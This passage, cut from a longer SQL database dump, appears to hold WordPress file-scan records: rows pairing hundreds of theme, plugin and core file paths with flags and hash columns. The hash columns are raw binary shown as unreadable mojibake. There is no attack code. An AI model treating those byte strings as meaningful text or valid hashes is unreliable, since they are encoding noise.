�K����\nT)r|||A����傞R�&�','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�\n�Ե��N3���E','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������þ�ڱ\nN��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('�\r���0D��Slo]�~','wp-content/themes/gambit/inc/widgets/roman.php',0,'m\r�����=�j��~J','m\r�����=�j��~J','��Z�D\"n�b�w��ْ���@����-\0��','',0,'?'),('�����.Q�j��E','wp-content/themes/graduate/assets/js/customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dzh�`��3���E�\'0','��=ד��������L�<h�W�d/f˶cݲ��','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('�3���	a�j�DEG7','wp-content/themes/graduate/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j:Qj.M�Tb1�\\P�0','�Q@�	De~�Q��-�FI�f�B�F�]9','',0,'?'),('�5��ث�#W`��r!�','wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q8_F�j�_�','�Sfu��!�G��gS+b��e�3�+���','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U?	��y�d��u�{m 5œ�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG	�!]E��9','',0,'?'),('�P\\Ҙ�-�񔰧�g�','wp-content/themes/hitmag/css/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������3x*&�Օ\r�','�Jts���̐/!�y[���R�04�R�<','',0,'?'),('�[>�*�ԭA�.���','wp-content/themes/hitmag/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�\n$B�>���M�','����tAg�����UcNWK��l��\n�+�dr)','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-��	0&������yl�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zy���.^�(/t�t','�6�/|�\'��kI7Yҝ���8~l�	�H���6','',0,'?'),('�tM�&�x�V�����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�142�%��F��)�','هO�x�,�{e>�z�Ɂ���s����2C��ܳ','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T����	?W��E>}�u���+��','',0,'?'),('�]h\Z������:HY','wp-content/themes/graduate/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9C1�ɢQ�{�4i','�]�*�Q�o$�-XX����i��Z5h��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('�����Q��R','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/meta.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>.�3+A�^��:{��C','��;w����-l8w�1\\��s&mB�@7�s$���','',0,'?'),('㫜ٯ�#z5R��x','wp-content/themes/wp-simple/parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��D�r� =s���','f(.d$�%�8ů�1��?w�]9�|o|�y&,1�','',0,'?'),('�Ʌ�;b:�<��ġ^6','wp-content/themes/gambit/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Q�:Ό*��;D','ҸEb�\'��\"�D�a�m��y�SBGn���e��','',0,'?'),('���]�a\"\ZC���}�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/twilight.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',1J���G\0�������','���e�cđ��Q�(1�N����S<�','',0,'?'),('���	���j�4u�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/merge/merge.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m-&���,','d���9�4��#Z����r��hj\'��]s�ܩ�','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���Wp�&���6�','wp-content/themes/skt-pathway/images/favicon.ico',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\0�~V�,O�߼Fx','@��@�����N��kl>]���^~Y���','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('��%���}��i�','wp-content/themes/advance/inc/customizer/fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�r�0�a�X_�͖Zw','�LN�\\A^G�,�M5�~��.�	�h%7rM*','',0,'?'),('���!O\"�*���++','wp-content/themes/catch-flames/js/jquery.cycle/jquery.cycle2.shuffle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CLՁ\ref{d/���/','���-i��1�SFP<`��\'M���J-��i1�<E','',0,'?'),('�w�J���\ZL�\\o�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9i���Ư���','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8�����Lk�5�Ѕ','�\'�<o��\'.��G�\"��v�2gwi̋\0','',0,'?'),('�HB%q\'\"��Vۿ','wp-content/themes/graduate/inc/modules/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��;5yTG��(�#p','O�M�?x&�g�V��.�)DzJAt��w�*}Q�','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('�,\rY�7�1�\Z��.�','wp-content/themes/quicksand/js/lightgallery/js/lightgallery-all.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��_1�T:&�IXɱ','��D���E���3�O��Ƥl�b�!d@������','',0,'?'),('�6g��\"33h��w3O�','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}4��%8�H�+��v�','�� uAO}ؒ�\\FB\\����>�ص���','',0,'?'),('�@Na\"�o��T�޿�D','wp-content/themes/simpleshift/parts/error-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~���\n�8{\"�%ԥ','Sn���J� ���%߳����E��e��#���O�','',0,'?'),('�XzG5(����	�','wp-content/themes/metro-magazine/images/modal-close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��k_*�΄�\0�','g�@gT�w2����B���γб]b�o%�_�W�','',0,'?'),('�\\�];d��\Z*�=�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sass/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���a�):f���','�u~��sC�&�f�H�:�/�X̱L�����]M�','',0,'?'),('�^ۛ�������F','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\0���8x��^��B','}߮�Y���+�H	ܥ`�֒�#�ʅx�-�6','',0,'?'),('�g����5��O`2�i','wp-content/themes/singularity/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Xvp���פv�ބ','-P8��s�\'�%��uiO�s\n�`�Ȫ;�','',0,'?'),('�o�mo@ \Z?�H��`q','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L+��r�E�j���(?','��M������;2h�%�~�!_�myt��;b','',0,'?'),('�yz,c߬��Ӝ�VΫ','wp-content/themes/newsmag/footer.php',0,'�G����-H1LE���H','�G����-H1LE���H','xZ���y��Em5��5�x_�P�ꂙl��','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�?	z�n�V�_','',0,'?'),('�|\\�Կ�� z�|n�]�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�l���F��|*','�oN��j��TK�pKy��F�u\"�PM0�','',0,'?'),('�~T;�v_E�Іt\0\'�','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_glass_100_f6f6f6_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_G[��A2,����','� 1`g�\'���)T�2�PC�W�6B� 7\Z��ɮ','',0,'?'),('䆏Z��Jp۱i�˂�','wp-content/themes/simpleshift/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w7E�@��%C.ۆwI','ǕI{�+$�`o�	�>�C�M�[\0B�\Z8y�','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('�W���|���lP\Z��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�#I}�Fw��<ſ�','�l��;�h�l���q���⋤�Q|V�Y��?�V-','',0,'?'),('�\"����%am�G','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��L��6��r','��2dٓ�qѾQ0X݋b��$�Ƴ5#��z��`','',0,'?'),('䗦���L��z/��%','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('�#�O�呌����)','wp-content/themes/hitmag/inc/widgets/block-posts-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yn+�Z>J��{f�','b�(7\'�	5�~�/F�#�S�_���wWJ:�','',0,'?'),('䴿<\r��+���h�\Z�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ��\ZqCე+R��','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('���é(x�xX_o�','wp-content/themes/graphene/admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':V��^o�Ṓ�@�!�','R��R����ߤ�Ϲ�|�֧�T�H�R[','',0,'?'),('���h��\nMlp�{','wp-content/themes/city-store/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LK\",~W/�*mX:��','��]ou�	_�n��J�ggg�pq�la��\'Oj','',0,'?'),('��{xю3�X>�`��q','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�2�s7؈_���','{�u���D�v���1t�s������œ)��','',0,'?'),('�э���<iPBb�$��','wp-content/themes/education-hub/inc/customizer/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h������U�!�','N�B�j�4ox�v�ȗ�\"�B��?h��9�Ql','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP�k��\Z��l(�','/S�\0�\\��T��Z��OL\\3aˑ���','',0,'?'),('����AvX|�*��\\}�','wp-content/themes/hemingway/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�Co�4��ߤЃ','���w��o-֐�i�:��j��\'ݍ��Zp�oӚ','',0,'?'),('���6�� X^�h&B','wp-content/themes/university-hub/template-parts/home/latest-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��\n�cI�CD�y','G֗�l̅�>�gU��L`[��Fa����@�t�','',0,'?'),('��l0	���I��','wp-content/themes/auberge/template-parts/content-attachment-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���4Q�i���]��','��_pgeB\r��\0�I����R��>-\Z,~','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('��%�B��*\0f����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�P�Sd�H�e�a�','�S�b�̴��O�5��<��$��(���s�� ��','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('�ڰ���ק��L`','wp-content/themes/event/inc/front-page/front-page-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�\\AƠ-��}�','�v�w�!W������\n��|��{�g�伏�&�','',0,'?'),('���5w�)��UhBH','wp-content/themes/advance/inc/kirki/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�`x�{��-ë�','��I�]D��.���.��]�G\0��(\0]?�','',0,'?'),('�B�S����N��K��@','wp-content/themes/gildrest/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D���d�~����UX','�(#�Y�?�X�k�a���mqH��	[\Z�_\0�','',0,'?'),('���(������0','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�f��P��\Z','Ւ�AG�Fy��#�&�T�X���!�','',0,'?'),('���L��}\Z����','wp-content/themes/graphene/images/sprite_master-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0Dy�Y$\ZJ5r�V\Z','�01�4,������%ܭ�q�	/K�<X','',0,'?'),('�G�d��Q�=L�/�J','wp-content/themes/enigma/core/lang/en_IN.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��1ɬ��L���','�	�����ߑ���n��W�X����\nv��hRy','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��׭\'���o','',0,'?'),('�7�s�8L*�L�h�*�','wp-content/themes/hitmag/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�X�\n+�d�*��&',',�Z-��	dA���=��Iq+#&o!��X0�~','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('�E}���p��Mp�D��','wp-content/themes/event/inc/widgets/widgets-functions/contactus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gҦ�v|�^$U�op�','����?�\"؀u�J˴qf��*�G�\'�6�;','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�f�G�A^��bE�H�\Z','wp-content/themes/catch-responsive/js/jquery.cycle/jquery.cycle2.scrollVert.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\"�U2M|����f��b','T�HG��pyI���L�v����Oa��2h','',0,'?'),('�nb\"�[���M	�f��','wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s>��pa��f]�{�m΢','�7/�x�+Cgn�#���J��\"MYB���s�','',0,'?'),('�wʼnZ��-��\n��r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c�\Zම#\Z֭','��|N�\0��a69�A��1N�%+���','',0,'?'),('�}�F8���Y:�$q��B','wp-content/themes/edge/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ݧL��W�J�','���(E�����WIl���_y\\=l=���Gv�','',0,'?'),('�N���S}G��.�','wp-content/themes/simpleshift/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m<2��3���	��','��D1-.T�1Q8����m�}�pr����pv','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('�	�[�3�CPZ��p','wp-content/themes/enigma/images/ultimate-image-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�gF�=�q�`��f','m���G��>��U��d(�!��8�.7g�7��','',0,'?'),('������~o/��.�','wp-content/themes/catch-flames/js/jquery.cycle.source/jquery.cycle2.tile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��2�<�5`�v�','$���]�P����t����&B�߳w#��ӄ�a��','',0,'?'),('�٫T�K��Q,�$���','wp-content/themes/newsmag/assets/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǰo�H(0��Z�$���','~J��\n��={������:�`�#O$$�D�','',0,'?'),('��d֦�9�V_��R��','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m^\\I�]�)�#���','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('��^7@?�9N�f','wp-content/themes/graphene/images/social/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �pA2�D��R:s��','�G�p�n��q�qz]6T&A�ՏG=��˯�P','',0,'?'),('�\\���+�\r\rE2���','wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iI�I&k��q�B���C�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('�_~ ������!�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YTЖb�%�����','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('���e�O�j�RH�@�','wp-content/themes/graphene/images/social/lockerz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ιǀ�e�o{�','���B��r�+���`Vע����F�Ls�','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gP\"	�P+Pg��h','����b�$磷#�6��Db˓���Z����4l(','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��w.��Ş1->�QY','�}5�X_Kr�Oe�鎜��g�i�v��\Z8��','',0,'?'),('�6�n��[l��v񺦼q','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�9j��k7�.��f�','wp-content/themes/graphene/images/social/twitpic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K45�2�ݚl�^�','��/qE&K�D<x�dٮ��˙�i�4@��','',0,'?'),('�?���~g�Z>��@�','wp-content/themes/brickyard/images/sidebar-li-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����s�a��C��2�','���H\r���Ks��:��_�;���z���G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('�Ka�z�@R����I�W�','wp-content/themes/exoplanet/functions/js/chosen.jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���@!}��\'2�C��','����}��U�s�I��ΞRm�k�m��ΐ8���','',0,'?'),('�O��ۆ��k��d4','wp-content/themes/gambit/template-parts/content-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƃ�\\�R0T�\0ya','wW~��iF~:�H�p�l�\rG�$��TUO;��','',0,'?'),('�O�4�6���\Zu����','wp-content/themes/catch-responsive/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ey����z\')�/�\0�','}��g9g��=g�gCO���8��b��W�y','',0,'?'),('�W�*�й�Ӝb�^','wp-content/themes/monograph/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\c��E��SVL��&','�K�K)\0�i��a	�p�:	v\'�����e ','',0,'?'),('�]>s��[�G�T)�y','wp-content/themes/weblog/acmethemes/hooks/footer.php',0,'^�EKi��R��&-��','^�EKi��R��&-��','�d��{c�]\"~Ǣ�v�u�P���=�j�O%','',0,'?'),('�z��~�Ͼ���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/loadmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<)����x[knok|','!�t+ik`��C��\\\"�ΆFq��s|I;z�2','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#z���w���l\n\'�','�q��̇P�I��.K�{r�P��|��F\n�m','',0,'?'),('��Da�Y8�� �-�','wp-content/themes/brickyard/docs/assets/images/img3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.n�\\���L�l�ʰ�','H� �ʸ�IK�g�K	oy	�����t�5��3','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g΋�?�Fb!}��ݿ��C��鳇','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�PK���.ٳ�\r','�+�>�����U��a`.4m킳+����U','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('���F�ވV7ݝ�\n','wp-content/themes/catch-responsive/inc/customizer-includes/upgrade-button/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7���ݯҿ[W�\'%�','�tCK1��Iʙ�]�q��e�T�\0�@f��9�r','',0,'?'),('���∽��Ŀ�y','wp-content/themes/hitmag/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!c&[uQ�{%f��9��','	(맫�i��@V��@��!�\r��hU�wl�(','',0,'?'),('����x*�ñ�U���','wp-includes/block-patterns/two-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I=k\Z���','�\\\\^�*k,;�_4�\'� oiU��@&e��','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ӝ�w�Yh�,�*�','�`c��LX����6��Im � B�]se��f�','',0,'?'),('���ӹ��`3�\n@ͅ4','wp-content/themes/weblog/acmethemes/hooks/slider-selection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x>̕^-����','�[V�!�AF\Z�\r�#{ 